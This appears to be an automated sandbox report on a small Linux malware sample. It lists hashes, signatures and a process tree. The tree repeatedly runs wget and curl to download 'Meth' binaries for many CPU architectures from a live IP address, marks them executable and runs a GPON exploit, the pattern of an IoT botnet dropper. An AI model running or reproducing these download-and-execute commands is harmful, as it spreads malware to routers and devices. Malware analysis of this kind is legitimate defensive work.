Analysis

  • max time kernel
    78s
  • max time network
    79s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-07-2024 03:58

General

  • Target

    084300db84b72d190951f7cca78ee9e3_JaffaCakes118

  • Size

    3KB

  • MD5

    084300db84b72d190951f7cca78ee9e3

  • SHA1

    a3a989180ea0ffa677ed97f1a3747c771caee062

  • SHA256

    d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f

  • SHA512

    ad0f90a8eb754101ce13fc19d18dc3d801aa297138aeb83b3e0e4ead97ec7c7d35b46e8834d2553385cad5bef0e8f281b5a6fdca8ce1a7a7bb4dac52eabcdef8

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 13 IoCs
  • Checks CPU configuration 1 TTPs 13 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 26 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:657
    • /usr/bin/wget
      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
      2⤵
        PID:658
      • /usr/bin/curl
        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:665
      • /bin/cat
        cat Meth.x86
        2⤵
          PID:666
        • /bin/chmod
          chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi
          2⤵
            PID:667
          • /tmp/sn0rt
            ./sn0rt gpon443.exploit
            2⤵
            • Executes dropped EXE
            PID:668
          • /usr/bin/wget
            wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
            2⤵
              PID:670
            • /usr/bin/curl
              curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              PID:671
            • /bin/cat
              cat Meth.mips
              2⤵
                PID:673
              • /bin/chmod
                chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi
                2⤵
                  PID:674
                • /tmp/sn0rt
                  ./sn0rt gpon443.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:675
                • /usr/bin/wget
                  wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                  2⤵
                    PID:677
                  • /usr/bin/curl
                    curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    PID:679
                  • /bin/cat
                    cat Meth.mpsl
                    2⤵
                      PID:680
                    • /bin/chmod
                      chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi
                      2⤵
                        PID:681
                      • /tmp/sn0rt
                        ./sn0rt gpon443.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:682
                      • /usr/bin/wget
                        wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                        2⤵
                          PID:684
                        • /usr/bin/curl
                          curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          PID:685
                        • /bin/cat
                          cat Meth.arm
                          2⤵
                            PID:688
                          • /bin/chmod
                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi
                            2⤵
                              PID:689
                            • /tmp/sn0rt
                              ./sn0rt gpon443.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:690
                            • /usr/bin/wget
                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                              2⤵
                                PID:692
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                PID:693
                              • /bin/cat
                                cat Meth.arm5
                                2⤵
                                  PID:694
                                • /bin/chmod
                                  chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi
                                  2⤵
                                    PID:695
                                  • /tmp/sn0rt
                                    ./sn0rt gpon443.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:696
                                  • /usr/bin/wget
                                    wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                    2⤵
                                      PID:699
                                    • /usr/bin/curl
                                      curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6
                                      2⤵
                                      • Checks CPU configuration
                                      • Reads runtime system information
                                      PID:705
                                    • /bin/cat
                                      cat Meth.arm6
                                      2⤵
                                        PID:706
                                      • /bin/chmod
                                        chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                        2⤵
                                          PID:707
                                        • /tmp/sn0rt
                                          ./sn0rt gpon443.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:708
                                        • /usr/bin/wget
                                          wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                          2⤵
                                            PID:710
                                          • /usr/bin/curl
                                            curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            PID:711
                                          • /bin/cat
                                            cat Meth.arm7
                                            2⤵
                                              PID:712
                                            • /bin/chmod
                                              chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                              2⤵
                                                PID:713
                                              • /tmp/sn0rt
                                                ./sn0rt gpon443.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:714
                                              • /usr/bin/wget
                                                wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                2⤵
                                                  PID:716
                                                • /usr/bin/curl
                                                  curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc
                                                  2⤵
                                                  • Checks CPU configuration
                                                  • Reads runtime system information
                                                  PID:719
                                                • /bin/cat
                                                  cat Meth.ppc
                                                  2⤵
                                                    PID:720
                                                  • /bin/chmod
                                                    chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                    2⤵
                                                      PID:721
                                                    • /tmp/sn0rt
                                                      ./sn0rt gpon443.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:722
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                      2⤵
                                                        PID:724
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k
                                                        2⤵
                                                        • Checks CPU configuration
                                                        • Reads runtime system information
                                                        PID:725
                                                      • /bin/cat
                                                        cat Meth.m68k
                                                        2⤵
                                                          PID:728
                                                        • /bin/chmod
                                                          chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                          2⤵
                                                            PID:729
                                                          • /tmp/sn0rt
                                                            ./sn0rt gpon443.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:730
                                                          • /usr/bin/wget
                                                            wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                            2⤵
                                                              PID:732
                                                            • /usr/bin/curl
                                                              curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc
                                                              2⤵
                                                              • Checks CPU configuration
                                                              • Reads runtime system information
                                                              PID:733
                                                            • /bin/cat
                                                              cat Meth.spc
                                                              2⤵
                                                                PID:734
                                                              • /bin/chmod
                                                                chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                2⤵
                                                                  PID:735
                                                                • /tmp/sn0rt
                                                                  ./sn0rt gpon443.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:736
                                                                • /usr/bin/wget
                                                                  wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                  2⤵
                                                                    PID:738
                                                                  • /usr/bin/curl
                                                                    curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686
                                                                    2⤵
                                                                    • Checks CPU configuration
                                                                    • Reads runtime system information
                                                                    PID:741
                                                                  • /bin/cat
                                                                    cat Meth.i686
                                                                    2⤵
                                                                      PID:742
                                                                    • /bin/chmod
                                                                      chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                      2⤵
                                                                        PID:743
                                                                      • /tmp/sn0rt
                                                                        ./sn0rt gpon443.exploit
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:744
                                                                      • /usr/bin/wget
                                                                        wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                        2⤵
                                                                          PID:746
                                                                        • /usr/bin/curl
                                                                          curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4
                                                                          2⤵
                                                                          • Checks CPU configuration
                                                                          • Reads runtime system information
                                                                          PID:747
                                                                        • /bin/cat
                                                                          cat Meth.sh4
                                                                          2⤵
                                                                            PID:748
                                                                          • /bin/chmod
                                                                            chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                            2⤵
                                                                              PID:749
                                                                            • /tmp/sn0rt
                                                                              ./sn0rt gpon443.exploit
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:750
                                                                            • /usr/bin/wget
                                                                              wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                              2⤵
                                                                                PID:752
                                                                              • /usr/bin/curl
                                                                                curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc
                                                                                2⤵
                                                                                • Checks CPU configuration
                                                                                • Reads runtime system information
                                                                                PID:755
                                                                              • /bin/cat
                                                                                cat Meth.arc
                                                                                2⤵
                                                                                  PID:756
                                                                                • /bin/chmod
                                                                                  chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt
                                                                                  2⤵
                                                                                    PID:757
                                                                                  • /tmp/sn0rt
                                                                                    ./sn0rt gpon443.exploit
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:758

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • memory/685-1-0xb672b000-0xb673c044-memory.dmp

                                                                                • memory/724-2-0xb6725000-0xb6736044-memory.dmp

                                                                                • memory/738-3-0xb676b000-0xb677c044-memory.dmp